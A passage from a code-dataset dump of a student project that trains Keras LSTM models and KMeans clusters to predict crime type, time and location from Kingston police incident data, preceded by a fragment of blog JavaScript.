$container.prepend(uploadMsg);\n resp = $.parseJSON(resp);\n resp = resp.post;\n _addToPosts(resp.postId, resp.postTitle, resp.postBody);\n _clearInputs();\n };\n $.post(url, args, callback);\n\t\t} else {\n\t\t\terrors.forEach(function(e) {\n\t\t\t\tconsole.log(e);\n\t\t\t});\n\t\t}\n }\n\n function deleteFromFeed(e) {\n // either an index value or an event object\n var i, postId;\n if(typeof e === \"number\") {\n i = e;\n if(i >= 0 && i < posts.length) {\n postId = posts[i].postId;\n } else {\n return;\n }\n } else {\n var $remove = $(e.target).closest('.post-container');\n postId = $remove.attr('data-post_id');\n i = $feed.find('.post').index($remove);\n }\n\n var url = \"./postDel\",\n args = {\n \"postId\": postId,\n },\n callback = function (resp) {\n console.log(resp);\n $container.prepend(removeMsg);\n posts.splice(i, 1);\n _render();\n };\n $.post(url, args, callback);\n }\n\n return {\n init: init,\n addToFeed: addToFeed,\n deleteFromFeed: deleteFromFeed\n };\n})();\n\nblog.init();\n" }, { "alpha_fraction": 0.4736842215061188, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 13.25, "blob_id": "f74bfe07a3cbcb34c8025b81f8a524b29bd49aa9", "content_id": "646a2ecf84cd1f102d5e0f24a6d322fcefdb6945", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 57, "license_type": "no_license", "max_line_length": 16, "num_lines": 4, "path": "/requirements.txt", "repo_name": "ras592/blog-mini", "src_encoding": "UTF-8", "text": "Jinja2==2.8\nMarkupSafe==0.23\npymongo==3.2.2\nweb.py==0.37\n" } ]
3
Hotchmoney/NeuralNets-Crime
https://github.com/Hotchmoney/NeuralNets-Crime
3c530dceb2d61ab435fcaf8726f5edbbaad5e095
793f786fa8b6904dd860e632f899a668b81c56c1
3d954220e07c76a081238549715108916f41d9ec
refs/heads/master
2021-05-01T14:31:52.319130
2018-02-11T05:18:09
2018-02-11T05:18:09
121,087,674
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.671345055103302, "alphanum_fraction": 0.686549723148346, "avg_line_length": 20.923076629638672, "blob_id": "46a8b64c03a8df920334cd1477ca43f3a23a4bc2", "content_id": "68115c44a71b808808f83320d42686e303d88f32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 855, "license_type": "no_license", "max_line_length": 72, "num_lines": 39, "path": "/Project/VisualizeLocation.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nfrom keras.models import load_model\nfrom keras.utils.visualize_util import plot\n\nmodel = load_model('my_modeltest.h5')\n\nnumpy.random.seed(7)\n\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\nToUseX = dataframe[:,9:]\n\n\ndef create_database(dataset,look_back=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-look_back-1):\n a= dataset[i:(i+look_back),:]\n dataX.append(a)\n dataY.append(dataset[i+look_back,:])\n return numpy.array(dataX), numpy.array(dataY)\n\n\nlatmax = max(dataframe[:,7])\nlongmax = max(dataframe[:,8])\nlatmin = min(dataframe[:,7])\nlongmin = min(dataframe[:,8])\n\nprint(latmax)\nprint(longmax)\nprint(latmin)\nprint(longmin)\n\ntoUse = create_database(ToUseX,4)\ntoUse = numpy.reshape(toUse,(toUse.shape[0],4,2))\n\npredict = model.predict(toUse)\n\nfor x in predict:\n print(x)\n" }, { "alpha_fraction": 0.722719132900238, "alphanum_fraction": 0.7465712428092957, "avg_line_length": 31.25, "blob_id": "fa761da8a73cc8bc0bf94463107cc135356c0abf", "content_id": "2bc1e7af98f8ade2f83b3a22ac4c0e53945b585b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1677, "license_type": "no_license", "max_line_length": 78, "num_lines": 52, "path": "/Project/PredictHoY.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nimport matplotlib.pyplot as plt\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #length 1/3rd of the dataset\n\ntrain_main = dataframe[0:train_size,11:13]\ntest_main = dataframe[train_size:len(dataframe),11:13]\n\ndef create_database(dataset,look_back=1):\n #3D arrays, len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ntrainX_main, trainY_main = create_database(train_main,4)\ntestX_main, testY_main = create_database(test_main,4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,2))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,2))\n\n'''\nRun The Neural NET\n'''\n\nmodel = Sequential()\nmodel.add(LSTM(32,input_dim=2))\nmodel.add(Dense(2))\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['accuracy'])\nmodel.fit(trainX_main,trainY_main,nb_epoch=10,batch_size=10,verbose=2)\n\nscore = model.evaluate(testX_main,testY_main,batch_size=10)\n\nprint(score)\n\nmodel.save('PredictHourOfYear.h5')\n" }, { "alpha_fraction": 0.7704545259475708, "alphanum_fraction": 0.7840909361839294, "avg_line_length": 24.823530197143555, "blob_id": "3458b05dcb014ed6ff5762e35c0a7a14bc2d62ab", "content_id": "ebea2f4766d2eb9cb7ee2f655d452b57412a27b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 440, "license_type": "no_license", "max_line_length": 97, "num_lines": 17, "path": "/README.md", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "# NeuralNets-Crime\n\nThe main files to look for are in the project file.\n\nThe main python files are Process_data.py, cluster.py, CrimeTypeMerged.py.\n\nThese contain the main elements of data processing, clustering and neural network implementation.\n\nThe results can be found in the trainingpredict.csv and testpredict.csv\n\nOrder of type of crime by index:\n0: assault\n1: break and enter\n2: robbery\n3: sex assault\n4: theft\n5: theft of vehicle\n\n" }, { "alpha_fraction": 0.6189770102500916, "alphanum_fraction": 0.6740795373916626, "avg_line_length": 21.353591918945312, "blob_id": "ad190d2af8f4be1abfa41c9c612b3e580fe4c617", "content_id": "d0adf79cb50b4f4f9bf4e8e4223e01c4a68ffc91", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4047, "license_type": "no_license", "max_line_length": 72, "num_lines": 181, "path": "/Project/cluster.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "from sklearn.cluster import KMeans\nfrom scipy.spatial.distance import cdist\nimport pickle\nimport numpy\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ndata = dataframe[:,7:9] #incident latitude & longitude\nindx = dataframe[:,:6] #crime type vector\n\ndat1 = numpy.empty(data.shape)\ndat2 = numpy.empty(data.shape)\ndat3 = numpy.empty(data.shape)\ndat4 = numpy.empty(data.shape)\ndat5 = numpy.empty(data.shape)\ndat6 = numpy.empty(data.shape)\n\n#initialize crime type counts\ni1=0\ni2=0\ni3=0\ni4=0\ni5=0\ni6=0\n\n#count crime type and add crime data to dat1..dat6 array\nfor i in range(len(data)):\n\tif indx[i][0] == 1:\n\t\tdat1[i1]+=data[i][:]\n\t\ti1+=1\n\telif indx[i][1] == 1:\n\t\tdat2[i2]+=data[i][:]\n\t\ti2+=1\n\telif indx[i][2] == 1:\n\t\tdat3[i3]+=data[i][:]\n\t\ti3+=1\n\telif indx[i][3] == 1:\n\t\tdat4[i4]+=data[i][:]\n\t\ti4+=1\n\telif indx[i][4] == 1:\n\t\tdat5[i5]+=data[i][:]\n\t\ti5+=1\n\telse:\n\t\tdat6[i6]+=data[i][:]\n\t\ti6+=1\n\n#for l=len(data)..0\nfor l in reversed(range(len(data))):\n\tif l > i1:\n\t\tdat1 = numpy.delete(dat1,l,0)\n\tif l > i2:\n\t\tdat2 = numpy.delete(dat2,l,0)\n\tif l > i2:\n\t\tdat3 = numpy.delete(dat3,l,0)\n\tif l > i4:\n\t\tdat4 = numpy.delete(dat4,l,0)\n\tif l > i5:\n\t\tdat5 = numpy.delete(dat5,l,0)\n\tif l > i6:\n\t\tdat6 = numpy.delete(dat6,l,0)\n\n'''\nCluster crime types\n'''\n\n#determine suitable number of cluster centers using 'elbow' method\nk_range = range(10,20) #try k = 10..20\n\n#perform K-means clustering for k = 10..20\nclust1 = [KMeans(n_clusters=k).fit(dat1) for k in k_range]\n\n#get centeroids for all 10 clusters\ncentroids1 = [X.cluster_centers_ for X in clust1]\n\n#distance between all datapoints and their cluster centers\nk_euclid1 = [cdist(dat1,cent,'euclidean') for cent in centroids1]\ndist1 = [numpy.min(ke,axis = 1) for ke in k_euclid1]\n\n#sum squared error\nwcss = [sum(d**2) for d in dist1]\n\n#best cluster for k=10..20 is the one with minimum error \nbestclust1 = clust1[wcss.index(min(wcss))]\n\nprint(\"Finished cluster 1\")\n\n'''\n#1 done\n'''\n\nclust2 = [KMeans(n_clusters=k).fit(dat2) for k in k_range]\n\ncentroids2 = [X.cluster_centers_ for X in clust2]\n\nk_euclid2 = [cdist(dat2,cent,'euclidean') for cent in centroids2]\ndist2 = [numpy.min(ke,axis = 1) for ke in k_euclid2]\n\nwcss2= [sum(d**2) for d in dist2]\n\nbestclust2 = clust2[wcss2.index(min(wcss2))]\n\n\nprint(\"Finished cluster 2\")\n'''\n#2 done\n'''\nclust3 = [KMeans(n_clusters=k).fit(dat3) for k in k_range]\n\ncentroids3 = [X.cluster_centers_ for X in clust3]\n\nk_euclid3 = [cdist(dat3,cent,'euclidean') for cent in centroids3]\ndist3 = [numpy.min(ke,axis = 1) for ke in k_euclid3]\n\nwcss3= [sum(d**2) for d in dist3]\n\nbestclust3 = clust3[wcss3.index(min(wcss3))]\n\n\nprint(\"Finished cluster 3\")\n'''\n#3 done\n'''\n\nclust4 = [KMeans(n_clusters=k).fit(dat4) for k in k_range]\n\ncentroids4 = [X.cluster_centers_ for X in clust4]\n\nk_euclid4 = [cdist(dat4,cent,'euclidean') for cent in centroids4]\ndist4 = [numpy.min(ke,axis = 1) for ke in k_euclid4]\n\nwcss4 = [sum(d**2) for d in dist4]\n\nbestclust4 = clust4[wcss4.index(min(wcss4))]\n\n\nprint(\"Finished cluster 4\")\n'''\n#4 done\n'''\n\nclust5 = [KMeans(n_clusters=k).fit(dat5) for k in k_range]\n\ncentroids5 = [X.cluster_centers_ for X in clust5]\n\nk_euclid5 = [cdist(dat1,cent,'euclidean') for cent in centroids5]\ndist5 = [numpy.min(ke,axis = 1) for ke in k_euclid5]\n\nwcss5 = [sum(d**2) for d in dist5]\n\nbestclust5 = clust5[wcss5.index(min(wcss5))]\n\n\nprint(\"Finished cluster 5\")\n'''\n#5 done\n'''\n\nclust6 = [KMeans(n_clusters=k).fit(dat6) for k in k_range]\n\ncentroids6 = [X.cluster_centers_ for X in clust6]\n\nk_euclid6 = [cdist(dat6,cent,'euclidean') for cent in centroids6]\ndist6 = [numpy.min(ke,axis = 1) for ke in k_euclid6]\n\nwcss6 = [sum(d**2) for d in dist6]\n\nbestclust6 = clust6[wcss6.index(min(wcss6))]\n\n\nprint(\"Finished cluster 6\")\n'''\n#6 done\n'''\n\npickle.dump(bestclust1,open( \"clust1.p\",\"wb\"))\npickle.dump(bestclust2,open( \"clust2.p\",\"wb\"))\npickle.dump(bestclust3,open( \"clust3.p\",\"wb\"))\npickle.dump(bestclust4,open( \"clust4.p\",\"wb\"))\npickle.dump(bestclust5,open( \"clust5.p\",\"wb\"))\npickle.dump(bestclust6,open( \"clust6.p\",\"wb\"))\n\nprint(\"All clusters saved\")\n\n" }, { "alpha_fraction": 0.7316195368766785, "alphanum_fraction": 0.749614417552948, "avg_line_length": 30.88524627685547, "blob_id": "07429e03f522c329e6fd22352f7d6a788ae1abd7", "content_id": "b4d4098ed80b31d7726070fbc80e5a86a56ce9cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1945, "license_type": "no_license", "max_line_length": 101, "num_lines": 61, "path": "/Project/CrimeType.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts upcoming crime type using last look_back crime types\n'''\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nSHAPE THE DATASET\n'''\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #length 1/3rd of the dataset\n\n#2D arrays, subsets of dataframe containing only first 6 elements of each entry\ntrain_main = dataframe[0:train_size,:6]\ntest_main = dataframe[train_size:len(dataframe),:6]\n\ndef create_database(dataset,look_back=1):\n #3D arrays, len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ntrainX_main, trainY_main = create_database(train_main,4)\ntestX_main, testY_main = create_database(test_main,4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,6))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,6))\n\n'''\nRUN THE NEURAL NET\n'''\n\nmodel=Sequential()\nmodel.add(LSTM(32,input_dim=6,return_sequences=False))\nmodel.add(Dense(6))\nmodel.compile(loss='mean_squared_error',optimizer='adam',metrics=['accuracy','categorical_accuracy'])\nmodel.fit(trainX_main, trainY_main, nb_epoch=int(1),batch_size=10, verbose=2)\n\nscore = model.evaluate(testX_main,testY_main,batch_size=10)\n\nprint(score)\n\nmodel.save('CrimePredict.h5')\n" }, { "alpha_fraction": 0.6298660635948181, "alphanum_fraction": 0.6586732864379883, "avg_line_length": 31.434343338012695, "blob_id": "0d4c838fdc046dde4ce3843e2ee6c49584f195af", "content_id": "0b5e806d418e8c551a583e32e1537520e6ce1757", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6422, "license_type": "no_license", "max_line_length": 529, "num_lines": 198, "path": "/Project/Process_data.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import re, time, urllib.request\nimport os\nimport numpy as np\nfrom sklearn.cluster import KMeans\nimport pickle\nimport math\nimport os\nfrom datetime import datetime\n\n'''\nTHIS PYTHON SCRIPT WILL DOWNLOAD THE DATASET\nAND FORMAT IT IN A PROPER METHOD WITH FOR USE\nWITH THE NEURAL NETWORK.\nWILL CREATE A FILE CALLED Kingston_Police_Formatted.csv\nWHICH IS THE FORMATTED POLICE DATA.\nRUN THIS FIRST\n'''\n\n\n\n#remove old dataset\nif (os.path.isfile('Kingston_Police.csv')):\n os.remove('Kingston_Police.csv')\n\n#calls and retrieves the data set\nurllib.request.urlretrieve(\"https://moto.data.socrata.com/api/views/fjwd-syvh/rows.csv?accessType=DOWNLOAD\",\"Kingston_Police.csv\")\n\n'''\nFunction that sorts data into proper\nhuman readable format using an alphanumerical strategy\n'''\ndef sort_nicely( l ):\n #function that converts string to int if possible\n convert = lambda text: int(text) if text.isdigit() else text\n\n #sort data by highest int value\n alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]\n l.sort( key=alphanum_key )\n return l\n\n'''\ninitializing all necessary variables to use\n'''\nincident_date_time=[]\nhour_of_year = []\nsin_cos_time = []\nincident_type = []\nincidenttype_set = set()\nincident_lat=[]\nincident_long=[]\ndatetimearr = []\nHour_of_Day_Cos = []\nHour_of_Day_Sin = []\nDay_of_Year = []\nDay_of_Week = []\nWeek_of_Year = []\nYear_Arr=[]\nloc_cluster = []\n'''\nLoads csv columns into arrays\nFilters through and prepares data\nfor exporting in formated manner\n'''\ni = 0;\nfor lines in open(\"Kingston_Police.csv\",\"r\"):\n if i == 0:\n labels=lines\n else:\n data = lines.split(',') #split row of csv\n date_time = datetime.strptime(data[2], '%m/%d/%Y %I:%M:%S %p') #convert entry 3 to datetime object\n hour_of_year = date_time.timetuple().tm_yday*24 + date_time.hour\n datetimearr+=[date_time]\n #convert incident_date_time into sin(2*pi*(time/maxtime)) and cos(2*pi*(time/maxtime))\n sin_cos_time += [[math.sin(2*math.pi*(hour_of_year/(365*24))), math.cos(2*math.pi*(hour_of_year/(365*24)))]];\n\n incident_date_time += [int(time.mktime(date_time.timetuple()))] #convert datetime to integer? idk\n incidenttype_set.add(data[3].lower())\n incident_type += [data[3].lower()]\n incident_lat += [float(data[12])]\n incident_long += [float(data[13])]\n loc_cluster += [[float(data[12]),float(data[13])]]\n i += 1\n'''\nTo use in order to normalize the latitude and longitude\n'''\nlatmax = max(incident_lat)\nlatmin = min(incident_lat)\nlongmin = min(incident_long)\nlongmax = max(incident_long)\n\n#normalize all latitude/longitude to values between 0-1\nnormalized_lat = []\nnormalized_long = []\nfor k in incident_lat:\n normalized_lat += [(k-latmin)/(latmax-latmin)]\n\nfor l in incident_long:\n normalized_long +=[(l-longmin)/(longmax-longmin)]\n\n#convert crime types to vectors of len(5)\nincident_type_unique = sort_nicely(list(incidenttype_set))\n\n'''\nimport kmeans clusters. These are generated by running cluster.py\n'''\nc1 = pickle.load(open(\"clust1.p\",\"rb\"))\nc2 = pickle.load(open(\"clust2.p\",\"rb\"))\nc3 = pickle.load(open(\"clust3.p\",\"rb\"))\nc4 = pickle.load(open(\"clust4.p\",\"rb\"))\nc5 = pickle.load(open(\"clust5.p\",\"rb\"))\nc6 = pickle.load(open(\"clust6.p\",\"rb\"))\n\n\n\n'''\nTurns a string of incident_type into a one hot array\nand predict cluster belonging\n'''\n\n\nfor x in incident_type:\n val = incident_type_unique.index(x)\n i= incident_type.index(x)\n if (val==0):\n incident_type[i]=[1,0,0,0,0,0]\n loc_cluster[i] = c1.predict(loc_cluster[i])\n elif (val ==1 or val==2):\n incident_type[i]=[0,1,0,0,0,0]\n loc_cluster[i] = c2.predict(loc_cluster[i])\n elif (val==3):\n incident_type[i]=[0,0,1,0,0,0]\n loc_cluster[i] = c3.predict(loc_cluster[i])\n elif (val==4 or val==5):\n incident_type[i]=[0,0,0,1,0,0]\n loc_cluster[i] = c4.predict(loc_cluster[i])\n elif (val==6):\n incident_type[i]=[0,0,0,0,1,0]\n loc_cluster[i] = c5.predict(loc_cluster[i])\n else:\n incident_type[i]=[0,0,0,0,0,1]\n loc_cluster[i] = c6.predict(loc_cluster[i])\n\n'''\nFormatting date time into multiple usable formats\nfor testing\n'''\nfor x in datetimearr:\n MinofDay = (x.timetuple().tm_hour*60)+ x.timetuple().tm_min\n Hour_of_Day_Cos+=[math.cos(2*math.pi*(MinofDay/(24)))]\n Hour_of_Day_Sin+=[math.sin(2*math.pi*(MinofDay/(24)))]\n Day_of_Year+=[x.timetuple().tm_yday]\n Day_of_Week+=[x.timetuple().tm_wday]\n Week_of_Year+=[math.floor(x.timetuple().tm_yday/7)]\n Year_Arr+=[x.timetuple().tm_year]\n\n\nfinal_list = []\n'''\nCreate final list to export\n'''\nfor x in range(len(incident_type)):\n final_list+=[[incident_type[x][0],incident_type[x][1],incident_type[x][2],incident_type[x][3],incident_type[x][4],incident_type[x][5],incident_date_time[x],incident_lat[x],incident_long[x],normalized_lat[x],normalized_long[x],sin_cos_time[x][0],sin_cos_time[x][1],Hour_of_Day_Cos[x],Hour_of_Day_Sin[x],Day_of_Year[x],Day_of_Week[x],Week_of_Year[x],Year_Arr[x],loc_cluster[x]]]\n\nfinal_arr = np.array(final_list)\n'''\nSort array chronologically using time\nin case certain elements are not chronological\n'''\nfinal_arr = final_arr[final_arr[:,6].argsort()]\n\nif (os.path.isfile('Kingston_Police_Formatted.csv')):\n os.remove('Kingston_Police_Formatted.csv')\n#write formatted data to Kingston_Police_Formatted.csv\nwith open('Kingston_Police_Formatted.csv','a') as out:\n for x in range(len(incident_type)):\n out.write(str(final_arr[x][0])+\",\"+str(final_arr[x][1])+\",\"+str(final_arr[x][2])+\",\"+str(final_arr[x][3])+\",\"+str(final_arr[x][4])+\",\"+str(final_arr[x][5])+\",\"+str(final_arr[x][6])+\",\"+str(final_arr[x][7])+\",\"+str(final_arr[x][8])+\",\"+str(final_arr[x][9])+\",\"+str(final_arr[x][10])+\",\"+str(final_arr[x][11])+\",\"+str(final_arr[x][12])+\",\"+str(final_arr[x][13])+\",\"+str(final_arr[x][14])+\",\"+str(final_arr[x][15])+\",\"+str(final_arr[x][16])+\",\"+str(final_arr[x][17])+\",\"+str(final_arr[x][18])+\",\"+str(final_arr[x][19])+\"\\n\")\n'''\n0:1st incident type\n1:2nd incident type\n2:3rd incident type\n3:4th incident type\n4:5th incident type\n5:6th incident type\n6:time in seconds since 1970\n7:incident latitude\n8:incident longitude\n9:normalized lat\n10:normalized long\n11:sin cos hour of year (sin)\n12:sin cos hour of year (cos)\n13:Hour of Day Cos\n14:Hour of Day sin\n15:Day of Year\n16:Day of Week\n17:Week of Year\n18:Year\n19:Location cluster index\n'''\n" }, { "alpha_fraction": 0.7311093211174011, "alphanum_fraction": 0.7475883960723877, "avg_line_length": 30.91025733947754, "blob_id": "93472f7273835bb2ccb0b4a524a9f530ef7ee369", "content_id": "7410886b6619f5a449c2244f76519db1e910cc73", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2488, "license_type": "no_license", "max_line_length": 86, "num_lines": 78, "path": "/Project/CrimeAndClusterMerged.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "import numpy\nimport matplotlib.pyplot as plt\nfrom keras.utils.visualize_util import plot\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Merge\nfrom keras.layers import Input\nfrom keras.layers import Embedding\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n\n\n'''\ncreate_database will create a numpy array with each\ndatapoint having x number of previous data points.\n'''\ndef create_database(dataset,look_back=1):\n #3D arrays: len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ndef create_database_1(dataset,look_back=1):\n dataX = []\n dataY = []\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back)])\n dataY.append(dataset[i+look_back])\n\n return numpy.array(dataX), numpy.array(dataY)\n\n\n\n\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #Train dataset length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #Test dataset length 1/3rd of the dataset\n\n#Retrieving crime type from dataframe\ntrain_main_type = dataframe[0:train_size,:6]\ntest_main_type = dataframe[train_size:len(dataframe),:6]\n\n#Retrieving hour Of Year from dataframe\ntrain_DOY_main = dataframe[0:train_size,11:13]\ntest_DOY_main = dataframe[train_size:len(dataframe),11:13]\n\n#Retrieving location from dataframe\ntrain_loc_main = dataframe[0:train_size,19:]\ntest_loc_main = dataframe[train_size:len(dataframe),19:]\n\n'''\nUsing create_database to get the 4 previous values for each datapoint.\nCreates a 3D numpy array.\n'''\n#X: input, Y: expected output\ntrainX_main, trainY_main = create_database(train_main_type,5)\ntestX_main, testY_main = create_database(test_main_type,5)\n\ntrainX_DOY, trainY_DOY = create_database(train_DOY_main,5)\ntestX_DOY, testY_DOY = create_database(test_DOY_main,5)\n\ntrainX_loc, trainY_loc = create_database_1(train_loc_main,5)\ntestX_loc, testY_loc = create_database_1(test_loc_main, 5)" }, { "alpha_fraction": 0.7211201786994934, "alphanum_fraction": 0.7432905435562134, "avg_line_length": 32.60784149169922, "blob_id": "02635d4c2a72456f0d2eeb95db319be0c25d5898", "content_id": "3a88164716addacd03d709636d0b379165c44d70", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "no_license", "max_line_length": 111, "num_lines": 102, "path": "/Project/MergedNN.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts upcoming crime type using last look_back crime types\n'''\nimport numpy\nimport matplotlib.pyplot as plt\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dropout\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom keras.layers import Merge\nfrom keras.layers import Input\nfrom keras.layers import Embedding\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nSHAPE THE DATASET\n'''\n\nnumpy.random.seed(7)\n\ndataframe = numpy.loadtxt(\"Kingston_Police_Formatted.csv\",delimiter=\",\")\ntrain_size = int(len(dataframe)*0.67) #length of 2/3rds into the dataset\ntest_size = int(len(dataframe)-train_size) #length 1/3rd of the dataset\n\ntrain_main_type = dataframe[0:train_size,:6]\ntest_main_type = dataframe[train_size:len(dataframe)-1,:6]\n\ntrain_DOY_main = dataframe[0:train_size,11:13]\ntest_DOY_main = dataframe[train_size:len(dataframe)-1,11:13]\n\ntrain_loc_main = dataframe[0:train_size,9:11]\ntest_loc_main = dataframe[train_size:len(dataframe)-1,9:11]\n\n\n\ndef create_database(dataset,look_back=1):\n #3D arrays, len(dataset) X number of datapoints X features per datapoint\n dataX = [] #datapoints are arrays containing last look_back crime types\n dataY = [] #datapoints are the upcoming crime type\n\n for i in range(len(dataset)-look_back-1):\n dataX.append(dataset[i:(i+look_back),:])\n dataY.append(dataset[i+look_back,:])\n\n return numpy.array(dataX), numpy.array(dataY)\n\ntrainX_main, trainY_main = create_database(train_main_type,4)\ntestX_main, testY_main = create_database(test_main_type,4)\n\ntrainX_DOY, trainY_DOY = create_database(train_DOY_main,4)\ntestX_DOY, testY_DOY = create_database(test_DOY_main,4)\n\ntrainX_loc, trainY_loc = create_database(train_loc_main,4)\ntestX_loc, testY_loc = create_database(test_loc_main, 4)\n\ntrainX_main = numpy.reshape(trainX_main,(trainX_main.shape[0],4,6))\ntestX_main = numpy.reshape(testX_main,(testX_main.shape[0],4,6))\n\nprint(\"Reshape Type\",trainX_main.shape,testX_main.shape)\n\ntrainX_DOY = numpy.reshape(trainX_DOY,(trainX_DOY.shape[0],4,2))\ntestX_DOY = numpy.reshape(testX_DOY,(testX_DOY.shape[0],4,2))\n\nprint(\"Reshape HOY\",trainX_DOY.shape,testX_DOY.shape)\n\ntrainX_loc = numpy.reshape(trainX_loc,(trainX_loc.shape[0],4,2))\ntestX_loc = numpy.reshape(testX_loc,(testX_loc.shape[0],4,2))\n\nprint(\"Reshape Location\", trainX_loc.shape, testX_loc.shape)\n\nDOY_Branch = Sequential()\nDOY_Branch.add(LSTM(32,return_sequences=False,input_dim = 2))\nDOY_Branch.add(Dense(2))\n\nType_Branch = Sequential()\nType_Branch.add(LSTM(32,return_sequences=False,input_dim = 6))\nType_Branch.add(Dense(6))\n\nLoc_Branch = Sequential()\nLoc_Branch.add(LSTM(32,return_sequences=False,input_dim=2))\n\nmerged = Merge([DOY_Branch, Type_Branch, Loc_Branch], mode='concat')\n\nfinal_model = Sequential()\nfinal_model.add(merged)\nfinal_model.add(Dense(6,activation='softmax'))\n\nfinal_model.compile(optimizer='rmsprop', loss='mean_squared_error',metrics=['accuracy','categorical_accuracy'])\nfinal_model.fit([trainX_DOY, trainX_main, trainX_loc], trainY_main, nb_epoch=1,batch_size=10, verbose=2)\ntry:\n print(\"Evaluating:)\n score = final_model.evaluate([testX_DOY, testX_main, testX_loc], testY_main, batch_size = 10)\n print (\"Score is : \"score)\n\nexcept:\n print(\"Couldn't evaluate due to nonetype error\")\n\nfinal_model.save('FunctionMergeCrimeHOY.h5')\n" }, { "alpha_fraction": 0.7117646932601929, "alphanum_fraction": 0.7333333492279053, "avg_line_length": 26.81818199157715, "blob_id": "615c6eabf47c5180ecedaf4dd8bc48b4a884f259", "content_id": "c6fca4e2b67cf2b2f864e9b653c9c6e4998d4741", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1530, "license_type": "no_license", "max_line_length": 101, "num_lines": 55, "path": "/Project/Location.py", "repo_name": "Hotchmoney/NeuralNets-Crime", "src_encoding": "UTF-8", "text": "'''\nPredicts longitude and latitude of upcoming crimes\n'''\nimport numpy\nimport pandas\nimport math\nfrom keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\n\n'''\nSHAPE THE 